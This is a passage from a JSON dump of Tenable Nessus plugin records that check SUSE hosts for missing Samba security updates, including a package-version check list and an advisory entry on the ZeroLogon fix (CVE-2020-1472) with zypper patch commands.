reference:\"samba-client-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-client-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:37", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nFixed an issue where multiple home folders were created(bsc#1174316, bso#13369).\n\nFixed an issue where the net command was unable to negotiate SMB2 (bsc#1174120);\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2721-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2721-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2721-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143864);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2721-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nFixed an issue where multiple home folders were created(bsc#1174316,\nbso#13369).\n\nFixed an issue where the net command was unable to negotiate SMB2\n(bsc#1174120);\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174316\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202721-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c4b90b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2020-2721=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-2721=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2020-2721=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-2721=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2020-2721=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-2721=1\n\nSUSE Linux Enterprise High Availability 12-SP4 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP4-2020-2721=1\n\nSUSE Linux Enterprise High Availability 12-SP3 